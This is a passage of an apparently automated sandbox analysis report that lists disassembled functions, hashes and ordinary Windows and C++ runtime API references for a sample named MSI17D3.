                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: GetcollLockitstd::_$AllocH_prolog3H_prolog3_LocalLockit::_Lockit::~_collatenumpunct
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 259100098-0
                                                                                                                                                                                • Opcode ID: ed7b35404e74544eaa44149d0e8b3b2a1beb9de20f56e52273d6f13e11cea16b
                                                                                                                                                                                • Instruction ID: b3e697696786ea2fb8230c59e0e55a4267a2ee74c34bf1ff3481b51e1c03bfda
                                                                                                                                                                                • Opcode Fuzzy Hash: ed7b35404e74544eaa44149d0e8b3b2a1beb9de20f56e52273d6f13e11cea16b
                                                                                                                                                                                • Instruction Fuzzy Hash: 4691DBB1D012156BE7107FB98C16BBF7AE9DF41320F20442EF919A7391DAB44901A7B2
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AdjustPointer
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1740715915-0
                                                                                                                                                                                • Opcode ID: da86d13401f36fa2ee23215f92610fc62d15fee119a1fa9ba355b8c7e91ee79f
                                                                                                                                                                                • Instruction ID: dd13089b5763b947ff2cfa5f48587bb547a950ffe0dd373dd5145c7e8b2dcf93
                                                                                                                                                                                • Opcode Fuzzy Hash: da86d13401f36fa2ee23215f92610fc62d15fee119a1fa9ba355b8c7e91ee79f
                                                                                                                                                                                • Instruction Fuzzy Hash: 1551F376600B06AFDB288F14D841BBAB7A4EF44311F14462FEB158B391E731EE40EB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ec0d00ff2596ef39acccc84e9548b44a46f5a6f0eaa703e035479edb82859bbb
                                                                                                                                                                                • Instruction ID: 28bff5a2a9f58b91b348e8669d072e1caf39bb900657bbe15e3aea1edc15c74b
                                                                                                                                                                                • Opcode Fuzzy Hash: ec0d00ff2596ef39acccc84e9548b44a46f5a6f0eaa703e035479edb82859bbb
                                                                                                                                                                                • Instruction Fuzzy Hash: A921D1B1605285AFDB20AF63CD61F6E77ACBF443607104616F92987250EB30EE10A760
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00000002,80004005,S-1-5-18,00000008), ref: 00CB6FB7
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                • String ID: > returned:$Call to ShellExecute() for verb<$Last error=
                                                                                                                                                                                • API String ID: 1452528299-1781106413
                                                                                                                                                                                • Opcode ID: 9b13bdb1a8c99b083620a352c6d58c225fe9f292a06f0199194c6f9b1495cda6
                                                                                                                                                                                • Instruction ID: 441c8ed61dc44f3285a8b4f4a264b45d70e27922389aaa29d72b4a1edb0f9bc0
                                                                                                                                                                                • Opcode Fuzzy Hash: 9b13bdb1a8c99b083620a352c6d58c225fe9f292a06f0199194c6f9b1495cda6
                                                                                                                                                                                • Instruction Fuzzy Hash: 7321A159B1022186CB342F78E40137AB2E0EF94754F65186FECC8D7390FAA98C8283A5
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CBF3E0
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CBF3EA
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CBF48E
                                                                                                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00CBF499
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Lockitstd::_$Concurrency::cancel_current_taskH_prolog3Lockit::_Lockit::~_
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4244582100-0
                                                                                                                                                                                • Opcode ID: 59420cbc0965f76710c0112243ede11986e25822e908c5bebe75170bbd14edf5
                                                                                                                                                                                • Instruction ID: 7faa685b3ffa487343a467edfed86764e1aba078d2af3f9c2e2844ce8ec53381
                                                                                                                                                                                • Opcode Fuzzy Hash: 59420cbc0965f76710c0112243ede11986e25822e908c5bebe75170bbd14edf5
                                                                                                                                                                                • Instruction Fuzzy Hash: 56214C34A0061ADFDB04EF14C851AADB771FF48711F108569E9259B7A1CB70EE51CF81
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,665E9022), ref: 00CBCD1C
                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00CBCD3C
                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00CBCD6D
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00CBCD86
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3604237281-0
                                                                                                                                                                                • Opcode ID: 58af6b28f1faf34fda211a760357635dcc10daa386ebc2cc725100d1638bad43
                                                                                                                                                                                • Instruction ID: 31d0d1c7b7605bfd6381e4c5dd9fde010105835e9adb8e9290742221606668f7
                                                                                                                                                                                • Opcode Fuzzy Hash: 58af6b28f1faf34fda211a760357635dcc10daa386ebc2cc725100d1638bad43
                                                                                                                                                                                • Instruction Fuzzy Hash: 0721B174941318ABD7209F54DC49FAEBBB8EB05B14F100229F615A72C0DBB06A0487E4
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CC2301
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CC230B
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CC235C
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC237C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2854358121-0
                                                                                                                                                                                • Opcode ID: 8a0e84891e406c6d7d77660d87b8c1f419492a1ff027ebb032cbeba36441c914
                                                                                                                                                                                • Instruction ID: 21dc12e9f45522275d4a7af1fb8f105d04348d837b179b0cd09a5b985490e04a
                                                                                                                                                                                • Opcode Fuzzy Hash: 8a0e84891e406c6d7d77660d87b8c1f419492a1ff027ebb032cbeba36441c914
                                                                                                                                                                                • Instruction Fuzzy Hash: B201C071900259DBCB05EBA4E841BBE7765AF84710F28050EF610AB3D1CF349E01DBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CBD6C4
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CBD6CE
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CBD71F
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CBD73F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2854358121-0
                                                                                                                                                                                • Opcode ID: f63c3880e286310d58dbfc70a9fec7b9487ed54c4fd8a60b4485838dcfd80ef1
                                                                                                                                                                                • Instruction ID: caa1b680c0e6cd8754bed3b9eedcec7279636ee2f831891d3c803f5c85807d73
                                                                                                                                                                                • Opcode Fuzzy Hash: f63c3880e286310d58dbfc70a9fec7b9487ed54c4fd8a60b4485838dcfd80ef1
                                                                                                                                                                                • Instruction Fuzzy Hash: 4701CC35900219DBCB05EBA4C845BFE7BA5BF80720F24050EF512AB392DF309E01DBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CBD7EE
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CBD7F8
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CBD849
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CBD869
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2854358121-0
                                                                                                                                                                                • Opcode ID: 6c90ef439bb658d511e0235a1ceb285a806e5d3e8871778e67fa8a5c1be63799
                                                                                                                                                                                • Instruction ID: 8cb48faa735eb712f4298894b739b91e4399509de602fb8cdc8279430f62d289
                                                                                                                                                                                • Opcode Fuzzy Hash: 6c90ef439bb658d511e0235a1ceb285a806e5d3e8871778e67fa8a5c1be63799
                                                                                                                                                                                • Instruction Fuzzy Hash: 2201AD72900219DBCB15ABA4D842BFE77A5AF80721F24040AF512AB3D2DF709E01D7A2
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CC27A9
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CC27B3
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CC2804
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2824
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2854358121-0
                                                                                                                                                                                • Opcode ID: b3fc3b54b99106e948984381f2797ab13db9db9d529d9f59925482a310d76121
                                                                                                                                                                                • Instruction ID: a7ad7d262e15ffd79519e65c132ce4f1c32663d74ecedd2ac8d600a87f012acf
                                                                                                                                                                                • Opcode Fuzzy Hash: b3fc3b54b99106e948984381f2797ab13db9db9d529d9f59925482a310d76121
                                                                                                                                                                                • Instruction Fuzzy Hash: 8F01C072900219DBCB05EBA4D841BBE7765BF84720F24050EEA15AB3D2CF309E01DBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CBD759
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CBD763
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CBD7B4
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CBD7D4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2854358121-0
                                                                                                                                                                                • Opcode ID: 55c13f41397d3ada78b1022ebac6bc2c7f5a099b2c26b365ac5c8bf9a302843e
                                                                                                                                                                                • Instruction ID: 5cd3b411d202ae1a94583d3394c87bb0060b8049988279b7bbb622a6c50c28e8
                                                                                                                                                                                • Opcode Fuzzy Hash: 55c13f41397d3ada78b1022ebac6bc2c7f5a099b2c26b365ac5c8bf9a302843e
                                                                                                                                                                                • Instruction Fuzzy Hash: EE01D276900229DFCB05EFA4C841BFE77A5AF80310F24050AF916AB392DF709E01D7A2
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CC2714
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CC271E
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CC276F
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC278F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2854358121-0
                                                                                                                                                                                • Opcode ID: 9c1bb983687424e23239a1eee1470e417b289bd0a5f12b061caa9d0e2ff80e9a
                                                                                                                                                                                • Instruction ID: c4fbd903b4fcf452d8f846c982403c686cb6b314915931e7de37c331e9cb12fb
                                                                                                                                                                                • Opcode Fuzzy Hash: 9c1bb983687424e23239a1eee1470e417b289bd0a5f12b061caa9d0e2ff80e9a
                                                                                                                                                                                • Instruction Fuzzy Hash: 03018075900219DBCB09EBA4D845BBE7775BF84710F24050EE514AB392CF709E05DBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CC28D3
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CC28DD
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CC292E
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC294E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2854358121-0
                                                                                                                                                                                • Opcode ID: 03761820902e36419a7453dac93aeaa1ca211aa35901dbe83c3fb27debd0da50
                                                                                                                                                                                • Instruction ID: 863e872e9380fa57702f4bfab3053c40d987914c422412aee339aacdd76d7c1d
                                                                                                                                                                                • Opcode Fuzzy Hash: 03761820902e36419a7453dac93aeaa1ca211aa35901dbe83c3fb27debd0da50
                                                                                                                                                                                • Instruction Fuzzy Hash: 4B01D271900219DBCB05EBA0D851FBE77B5AF84720F24050EF615AB392CF709E01DBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CC283E
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CC2848
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CC2899
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC28B9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2854358121-0
                                                                                                                                                                                • Opcode ID: 0f9a35dce76cfe054766802da1be831b2e8340bf89e4d8ba6439f45c610a53bb
                                                                                                                                                                                • Instruction ID: 825c51cc7d03ce38479a1c56d3fe1908e255d996a1f04ae01aa0c6d751141063
                                                                                                                                                                                • Opcode Fuzzy Hash: 0f9a35dce76cfe054766802da1be831b2e8340bf89e4d8ba6439f45c610a53bb
                                                                                                                                                                                • Instruction Fuzzy Hash: 13016D72900229DBCB15EBA4D841BBE77A5BF84720F24050EE515AB3D2DF709A05DBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CCE974
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CCE97E
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CCE9CF
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CCE9EF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2854358121-0
